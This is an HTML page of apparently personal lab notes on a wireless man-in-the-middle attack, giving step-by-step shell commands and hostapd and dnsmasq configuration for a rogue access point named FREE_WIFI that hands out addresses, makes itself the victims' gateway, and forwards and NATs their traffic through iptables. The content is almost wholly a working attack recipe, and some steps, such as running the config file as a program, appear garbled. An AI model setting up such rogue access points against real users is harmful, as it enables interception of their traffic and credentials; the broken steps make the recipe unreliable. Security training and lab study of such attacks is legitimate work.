<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Wi-Fi MiTM attack</title>
</head><body><b><u>WIRELESS MAN-IN-THE-MIDDLE ATTACKS<br/>
</u></b>To be able to execute such an attack, we will need to expand the capabilities of our rogue access point to make it behave more like a wireless router. This means running our own DHCP server to provide IP addresses to wireless clients, as well as a DNS server for name resolution. Finally we'll need to redirect packets from one NIC to another.<br/>
<img src="image.png" /><br/>
All of the following can be done as script, cloned in to /opt/&lt;evilhotspot&gt;<br/>
https://github.com/s0lst1c3/awae/blob/master/lab2/hotspot.sh<br/>
<br/>
1) Prevent extraneous processes from interfering with the rogue access point<br/>
:~# service network-manager stop<br/>
:~# rfkill unblock wlan<br/>
:~# ifconfig wlan0 up<br/>
<br/>
<br/>
2) Create Access Point (using hostapd).<br/>
Copy the following text in to hostapd.conf<br/>
interface=<b>wlan0</b><br/>
driver=nl80211<br/>
ssid=<b>FREE_WIFI</b><br/>
channel=1<br/>
hw_mode=g<br/>
<br/>
3) Run hostapd<br/>
/opt/--/hostapd/hostapd:~# ./hostapd.conf<br/>
<br/>
4) Give AP an IP address and subnet mask. Also, update our routing table to allow our rouge AP to serve as the default gateway of it's subnet<br/>
:~# ifconfig wlan0 10.0.0.1 netmask 255.255.255.0<br/>
:~# route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1<br/>
<br/>
5) Set up DHCP. <br/>
Copy the following code in to dnsmasq.conf<br/>
<i>(locate command to find a file)</i><br/>
<span style="font-family: Serif"># define DHCP pool<br/>
dhcp-range=10.0.0.80,10.0.0.254,6h<br/>
# set Google as nameserver<br/>
dhcp-option=6,8.8.8.8<br/>
# set rogue AP as Gateway<br/>
dhcp-option=3,10.0.0.1 #Gateway<br/>
dhcp-authoritative<br/>
log-queries<br/>
</span><br/>
6) Run in <b>new</b>&nbsp;terminal<br/>
<span style="font-family: Serif">:~# dnsmasq -z -p 0 -C ./dnsmasq.conf -i "$phy" -I lo<br/>
</span>where -z prevents the winding to wildcard address<br/>
-i forces dnsmasq to only listen on our $phy interface<br/>
-I (capital i) explicity forbids dnsmasq from running on local interface<br/>
-p indicates the prot on which dnsmasq should bind when acting as DNS server. Setting -p to 0 instructs dnsmasq to not start it's DNS server at all. <br/>
<br/>
Now we have an access point, a DNS server, and a DHCP server. <br/>
<br/>
7) Enable packet forwarding (User the proc filesystem)<br/>
:~# echo '1' &gt; /proc/sys/net/ipv4/ip_forward<br/>
<br/>
8) Configure iptables to allow access point to act as a NAT. <br/>
:~# iptables --policy INPUT ACCEPT<br/>
:~# iptables --policy FORWARD ACCEPT<br/>
:~# iptables --policy OUTPUT ACCEPT<br/>
:~# iptables --flush<br/>
:~# iptables --table nat --flush<br/>
:~# iptables --table nat --append POSTROUTING -o $upstream --jump MASQUERADE<br/>
<br/>
</body></html>